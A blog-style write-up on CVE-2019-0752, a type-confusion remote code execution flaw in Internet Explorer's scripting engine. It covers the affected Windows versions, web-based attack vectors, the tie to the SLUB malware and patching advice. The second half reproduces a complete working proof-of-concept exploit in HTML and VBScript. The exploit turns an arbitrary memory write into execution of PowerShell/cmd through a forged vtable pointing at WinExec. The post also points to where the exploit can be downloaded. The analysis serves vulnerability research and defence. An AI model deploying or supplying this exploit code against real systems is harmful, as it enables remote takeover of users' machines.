An Aggregated Understanding of Vulnerability Analysis of CVE-2019–0752

For many people , the idea of Vulnerability Analysis may seem daunting , or far outside of the scope of knowledge , and I must be honest, for some this is true, however given some pointers I think that we could begin to dissect and synthesize the information and approach necessary to get started.

I chose CVE-2019–0752 because there is adequate information available on the topic and the major vendors have some great information on the topic, also being an aspiring Vulnerability Researcher this could only help me be better.

In most incidents there are artifacts that only the sluthiest of analysts can uncover , observe and document its behavior. This Vulnerability is pretty interesting because of the method of persistence, low system requirements from the affected systems, and also the system resource being leveraged.

CVE-2019–0752 is a Remote Code Execution(RCE) that leverages the scripting engine which is responsible for handling various objects in memory in Windows Internet Explorer. It is also known as Scripting Engine Memory Corruption Vulnerability as reported by MITRE Corporation 2018. This vulnerability is credited to Simon Zuckerbraun. This vulnerability enables the malicious actor to gain the same rights as the current logged-in user, this is specifically leveraged in the hopes that the user has administrative privileges. This method of execution can open the opportunities to leverage multiple vectors of attack, from web based , session compromise for initial foothold , redirection to previously compromised servers and applications, enabling account session-hijacking / account compromise.

The Victims of CVE-2019–0752 can be found in the following areas because the scripting engine has a vulnerability that manipulates Microsoft Internet Explorer version 10 and 11 on the Microsoft Windows Operating System 10 (1709), Microsoft Windows Operating System 10 (1703), Microsoft Windows 10 (1607), Microsoft Windows Server 2008 R2 , Microsoft Windows 8.1 , Microsoft Windows Rt 8.1 , Microsoft Windows Server 2016 , Microsoft Windows Server 2019 , Microsoft Windows 7 , Microsoft Windows 10 1803 , Microsoft Windows 10 1809 , Microsoft Windows Server 2012 R2 , Microsoft Windows Server 2012 , are the know and reported systems known to be vulnerable without patches.

So how do we execute this or what does it take to see the execution of this scripting engine vulnerability ? Well this is what is required to leverage this particular vulnerability :

Do we need user interaction ? The short answer is yes , here’s a longer explanation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

So we opened a web browser ? So what happened , what can we look forward to discovering?

The flaw exists within the handling of script commands that set certain properties of DOM objects. By performing actions in script, an attacker can trigger a type confusion condition. This can be leveraged to perform remote code execution during or within the context of a current running process.

The Document Object Model

The most important bits to know about CVE-2019–0752 :

If the vulnerability is executed while the users are logged attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website.

An attacker could also embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the IE rendering engine.

The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability. The security update addresses the vulnerability by modifying how the scripting engine handles objects in memory. (Rapid7.com 2019)

Because this is a vulnerability focused on Microsoft Internet Explorer and other microsoft products that use the embedded rendering engine, the ability for this vulnerability to quickly provide access within unpatched networks and vulnerable applications is very possible, and given the availability of the Proof Of Concept on various open source platforms there is a low bar of entry to leverage this vulnerability.

Based on the information provided surrounding CVE-2019–0752 a common execution of this attack vector is the creation of compromised web servers, that act as watering holes of initial points of compromise, this website or webserver then provides a binary masquerading as a legitimate application , which the user interacts with via a click or installation. This then enables the malicious code to either execute as the current user , or continue rogue activities such as accessing additional exploits as seen in the SLUB malware family , discovered and reported by trend micro, enabling C2 through the popular messaging apps Slack and Github code repositories.

Is this vulnerability patched and has it been sighted in the wild ?

The short answer is yes . But the longer answer is, it evolved in to initial staging for the SLUBS Malware Family.

This exploit can easily be obtained from the internet via https://www.exploit-db.com/exploits/46928 . The attacker could download the binary and encode it as a payload and deploy it to the victim platform. There has been various attack vector/groups that leverage this attack as initial point of compromise. This CVE has been linked to the SLUBS Malware execution. See diagram below (Trend Micro 2019)

Are there any active measures or methods to defend against such a crafty vulnerability ?

The recommended mitigation is update and maintain the latest versions of Microsoft Internet Explorer and apply the recommended patches; this is the vendor patch packages required to remediate the issue. https://www.catalog.update.microsoft.com/Search.aspx?q=KB4493441 and https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0752 .

Add the following YARA rules within your firewall or IDS solutions throughout your enterprise, CVE-2019–0752 to detect both the CVE and the presence of SLUB within your network
xor_0x20_xord_javascript. Also deny non-signed executables to your endpoints within the network, to prevent non-authentic binaries from being leveraged within the corporation. Provide a single internal server cluster/vlan to provide patches and updates to the customer endpoints. Ensuring the endpoints within the corporation has the latest virus definitions within the windows defender is a very low-cost solution to mass protection from this very effective attack vector, when I attempted to download on to my test windows 10 box the windows defender stopped the download.

What's the latest news after all this is a old vulnerability right ? Wrong !

The Presence of our beloved vulnerability on twitter

What does the code actually look like you might ask ? O do I have you covered buddy. I know the code is super long , I thought that here might be a great place to stop and say thanks for reading , I hope the writeup and links provide a little insight as to how a Vulnerability Analyst or Researcher might provide information , and the type of information that might assist your organization with remediation and containment of vulnerable machines or better yet prevent execution all together.

<! — Full exploit of ZDI-19–359/ZDI-CAN-7757/CVE-2019–0752 →

<! — Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) →

<! — Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 →

<! — Tgroupcrew@gmail.com →

<! — Demonstrates taking an arbitrary write primitive with no info leak, and using it to get →

<! — all the way to RCE using no shellcode. →

<! — Note use of CVE-2019–0768 to get VBScript to run on IE/Win10. →

<! — (h/t: James Forshaw, Google Project Zero) →

<html>

<meta http-equiv=”x-ua-compatible” content=”IE=8">

<meta http-equiv=”Expires” content=”-1">

<body>

<div id=”container1" style=”overflow:scroll; width: 10px”>

<div id=”content1" style=”width:5000000px”>

Content

</div>

</div>

<script language=”VBScript.Encode”>

Dim ar1(&h3000000)

Dim ar2(1000)

Dim gremlin

addressOfGremlin = &h28281000

Class MyClass

Private mValue

Public Property Let Value(v)

mValue = v

End Property

Public Default Property Get P

P = mValue ‘ Where to write

End Property

End Class

Sub TriggerWrite(where, val)

Dim v1

Set v1 = document.getElementById(“container1”)

v1.scrollLeft = val ‘ Write this value (Maximum: 0x001767dd)

Dim c

Set c = new MyClass

c.Value = where

Set v1.scrollLeft = c

End Sub

‘ Our vulnerability does not immediately give us an unrestricted

‘ write (though we could manufacture one). For our purposes, the

‘ following is sufficient. It writes an arbitrary DWORD to an

‘ arbitrary location, and sets the subsequent 3 bytes to zero.

Sub WriteInt32With3ByteZeroTrailer(addr, val)

TriggerWrite addr , (val) AND &hff

TriggerWrite addr + 1, (val\&h100) AND &hff

TriggerWrite addr + 2, (val\&h10000) AND &hff

TriggerWrite addr + 3, (val\&h1000000) AND &hff

End Sub

Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)

For i = 0 To Len(str) — 1

TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))

Next

End Sub

Function ReadInt32(addr)

WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr

ReadInt32 = ar1(gremlin)

End Function

Function LeakAddressOfObject(obj)

Set ar1(gremlin + 1) = obj

LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)

End Function

Sub Exploit()

‘ Corrupt vt of one array element (the “gremlin”)

TriggerWrite addressOfGremlin, &h4003 ‘ VT_BYREF | VT_I4

For i = ((addressOfGremlin — &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100

If Not IsEmpty(ar1(i)) Then

gremlin = i

Exit For

End If

Next

If IsEmpty(gremlin) Then

MsgBox “Could not find gremlin”

Exit Sub

End If

For i = 0 To UBound(ar2)

Set ar2(i) = CreateObject(“Scripting.Dictionary”)

Next

Set dict = ar2(UBound(ar2) / 2)

addressOfDict = LeakAddressOfObject(dict)

vtableOfDict = ReadInt32(addressOfDict)

scrrun = vtableOfDict — &h11fc

kernel32 = ReadInt32(scrrun + &h1f1a4) — &h23c90

winExec = kernel32 + &h5d380

dict.Exists “dummy” ‘ Make a dispatch call, just to populate pld

‘ Relocate pld to ensure its address doesn’t contain a null byte

pld = ReadInt32(addressOfDict + &h3c)

fakePld = &h28281020

For i = 0 To 3–1

WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)

Next

fakeVtable = &h28282828 ‘ ASCII “((((“

For i = 0 To 21

If i = 12 Then ‘ Dictionary.Exists

fptr = winExec

Else

fptr = ReadInt32(vtableOfDict + 4 * i)

End If

WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr

Next

WriteAsciiStringWith4ByteZeroTrailer addressOfDict, “((((\..\PowerShell.ewe -Command “”<#AAAAAAAAAAAAAAAAAAAAAAAAA”

WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld

WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, “#>$a = “”””Start-Process cmd `””””””/t:4f /k whoami /user`”””””””””””” ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))”””

On Error Resume Next

dict.Exists “dummy” ‘ Wheeee!!

‘ A little cleanup to help prevent crashes after the exploit

For i = 1 To 3

WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict

WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2

Next

Erase Dict

Erase ar2

End Sub

Exploit

</script>

</body>

</html>